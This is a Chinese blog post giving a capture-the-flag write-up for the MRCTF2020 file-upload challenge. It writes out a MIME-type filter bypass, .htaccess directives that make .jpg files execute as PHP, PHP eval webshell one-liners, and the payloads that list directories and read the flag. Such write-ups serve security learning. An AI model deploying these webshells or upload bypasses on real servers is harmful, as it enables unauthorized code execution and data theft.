[MRCTF2020]你传你🐎呢

原理

  1. .htaccess文件解析漏洞
  2. 以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦- -
  3. 手搓连接木马的系统命令多种使用方式
  4. payload:var_dump(scandir('/')); echo file_get_contents('/flag');

解题过程

进入靶场,让上传文件

上传文件抓包,发现包被过滤了,先试试改MIME值

发现MIME值改成png就能上传了

但是上传的只是gif文件,把文件后缀换成php,phtml等等都不行被过滤了。再试试上传.htaccess
同理修改MIME值才能过

.htaccess写法 方法一 <FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch> // 1.jpg <?php eval($_GET['a']);?> 方法二: AddType application/x-httpd-php .jpg // 1.jpg <?php eval($_GET['a']);?>
php木马写法 <script language='php'>@eval($_POST['aaa']);</script> <?php @eval($_POST['aaa']);?>

那就用工具连接或者手动连接了

手动连接的时候参数echo system('ls /')或者var_dump(system('ls /'))都不行 只有var_dump(scandir('/'))才可以读出目录 最后读取文件内容 var_dump(file_get_contents('/flag'));

参考文章:https://blog.csdn.net/weixin_44632787/article/details/118049911


__EOF__

本文作者BEONTHE
本文链接https://www.cnblogs.com/BEONTHE/p/17751711.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:转载请注明来源
声援博主:UP UP UP !!!
posted @   圆弧状态  阅读(20)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示